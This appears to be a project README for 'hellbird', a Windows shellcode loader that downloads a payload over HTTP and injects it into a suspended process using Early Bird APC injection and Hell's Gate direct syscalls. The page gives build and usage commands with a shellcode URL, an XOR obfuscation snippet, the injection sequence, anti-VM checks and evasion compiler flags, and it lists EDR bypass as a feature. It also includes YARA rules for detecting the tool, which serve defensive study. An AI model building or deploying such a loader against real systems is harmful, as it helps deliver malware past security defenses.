https://medium.com/@lazyown.redteam/the-hellbird-chronicles-when-your-notepad-becomes-a-cyber-assassin-and-why-thats-a-feature-not-54544dc2e099

https://deepwiki.com/grisuno/hellbird

• GitHub Repository: https://github.com/grisuno/hellbird
• License: GNU General Public License v3.0 (GPLv3)
• Author: grisun0
• Target Platform: Windows (x64)
• Source Platform: GNU/Linux 6.12 (tested on Kali)
• Purpose: Academic research and red teaming exercises

⚠️ This project is released under GPLv3. See the DISCLAIMER section for full legal terms.

This document provides a comprehensive introduction to the hellbird repository, a sophisticated Early Bird APC injection framework designed for red team operations and academic security research. The framework implements advanced evasion techniques including direct NT API syscalls, string obfuscation, and anti-analysis mechanisms to bypass modern EDR/AV solutions on Windows x64 systems.

For detailed information about specific payload generation processes, see Payload Generation System. For integration into red team frameworks, see Framework Integration. For technical implementation details of evasion techniques, see Evasion Techniques.

hellbird is a sophisticated Early Bird APC injection Over HELLGATES tool designed to download and execute shellcode in a suspended legitimate Windows process using Direct syscalls and asynchronous procedure calls (APC). It leverages string obfuscation, anti-analysis techniques, and manual WinSock HTTP downloading to evade basic detection mechanisms.

This tool is intended exclusively for academic and ethical penetration testing purposes.

The framework implements the Hell's Gate technique to perform direct system calls, bypassing EDR userland hooks on NT API functions.

The framework implements robust PEB (Process Environment Block) walking to locate ntdll.dll without relying on standard APIs that may be hooked.

The Early Bird APC injection technique combined with direct syscalls provides multiple layers of evasion against behavioral monitoring and EDR solutions.

The get_hellbird3.sh script generates:

• hellbird.c: The main implant source code with embedded obfuscated configuration.
• Makefile: Cross-compilation rules using MinGW-w64.

sudo apt install mingw-w64 && sh install.sh

./gen_hellbird3.sh \
  --target windows \
  --url "http://192.168.1.100/shellcode.txt" \
  --process-name "C:/Windows/System32/calc.exe" \
  --key 0x33

✅ Output: hellbird.exe — a fully self-contained Windows executable.

• -lws2_32 Link Winsock library Network functionality
• -s Strip symbols Anti-analysis
• -Os Optimize for size Reduced footprint
• -fno-stack-protector Disable stack protection Evasion technique
• -static Static linking Standalone executable

1. String Obfuscation All strings are XOR-encoded at compile time using a user-provided key (default: 0x33):

unsigned char OBF_SHELLCODE_URL[] = { 0x12, 0x34, ... };

Decoded at runtime via:

void xor_string(char* data, size_t len, char key) {
    for (int i = 0; i < len; i++) data[i] ^= key;
}

2. Shellcode Download & Extraction

• Parses HTTP response body.
• Extracts shellcode in \xNN\xNN... format.
• Applies XOR decryption using the same key.
• Enforces size limit: 2 MB by default.

3. Process Injection Flow

1. Create target process (e.g., calc.exe) in SUSPENDED state
2. Resolve NtAllocateVirtualMemory → Allocate RWX memory
3. Resolve NtWriteVirtualMemory → Write shellcode
4. Resolve NtQueueApcThread → Queue APC to remote thread
5. Resume thread → APC executes shellcode

4. Anti-Analysis Checks Checks BIOS version string in registry:

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Exits if any of the following substrings are found:

• VMWARE
• VBOX
• QEMU
• XEN

Basic IOC: Obfuscated Strings + NT API Imports

rule ebird3_EarlyBird_APC {
    meta:
        author = "LazyOwn BlueTeam Analyst"
        description = "Detects ebird3 Early Bird APC injector"
        reference = "https://github.com/grisuno/ebird3"
        license = "GPLv3"

    strings:
        $xord_url = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 } // XOR loop pattern
        $ntdll_imports = "ntdll.dll" ascii wide
        $nt_funcs[4] = (
            "NtAllocateVirtualMemory"
            "NtWriteVirtualMemory"
            "NtQueueApcThread"
            "NtClose"
        )
        $create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED flag
        $http_get = "GET /" ascii wide
        $user_agent = "Mozilla/5.0 (Windows NT 10.0;" ascii wide

    condition:
        all of ($nt_funcs) and $ntdll_imports and $create_suspended and
        ($http_get or $user_agent) and $xord_url
}

Heuristic: Suspicious Memory Allocation + APC

rule ebird3_NtQueueApcThread_Heuristic {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects use of NtQueueApcThread for shellcode execution"

    strings:
        $apc_call = /call.*GetProcAddress.*NtQueueApcThread/
        $alloc_exec = "MEM_COMMIT | MEM_RESERVE" fullword
        $page_exec_rw = "PAGE_EXECUTE_READWRITE" fullword

    condition:
        $apc_call and $alloc_exec and $page_exec_rw
}

rule hellbird_EarlyBird_HellsGate {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects hellbird Early Bird + Hell's Gate injector"
        license = "GPLv3"

    strings:
        $ntdll_import = "ntdll.dll" ascii wide
        $syscalls[4] = (
            "NtAllocateVirtualMemory"
            "NtWriteVirtualMemory"
            "NtQueueApcThread"
            "NtResumeThread"
        )
        $create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED
        $xor_loop = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 }
        $peb_access = "gs:0x60" nocase

    condition:
        all of ($syscalls) and $ntdll_import and $create_suspended and $xor_loop and $peb_access
}

• NT API Calls
• Bypasses userland API hooks from EDRs
• No WinINet/WinHTTP
• Avoids common HTTP beaconing detection
• XOR Obfuscation
• Hides C2 URL and process name
• Anti-VM
• Prevents analysis in sandboxed environments
• Small Binary Size
• Harder to analyze statically
• APC Injection
• Executes before main thread starts (early bird)

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

This project is intended to:

Help security researchers understand APC injection and NT API abuse. Assist blue teams in developing better detection rules. Promote awareness of living-off-the-land techniques.

• https://github.com/grisuno/LazyOwn
• https://grisuno.github.io/LazyOwn/
• https://www.reddit.com/r/LazyOwn/
• https://github.com/grisuno/LazyOwnBT
• https://web.facebook.com/profile.php?id=61560596232150
• https://app.hackthebox.com/teams/overview/6429
• https://app.hackthebox.com/users/1998024
• https://patreon.com/LazyOwn
• https://deepwiki.com/grisuno/ebird3
• https://deepwiki.com/grisuno/hellbird
• https://github.com/grisuno/cgoblin
• https://github.com/grisuno/gomulti_loader
• https://github.com/grisuno/ShadowLink
• https://github.com/grisuno/OverRide
• https://github.com/grisuno/amsi
• https://medium.com/@lazyown.redteam
• https://discord.gg/V3usU8yH
• https://ko-fi.com/Y8Y2Z73AV
• https://medium.com/@lazyown.redteam/the-ebird3-chronicles-when-your-calculator-gets-a-phd-in-cybercrime-and-why-thats-perfectly-cc1738a3affc
• https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.58.tar.gz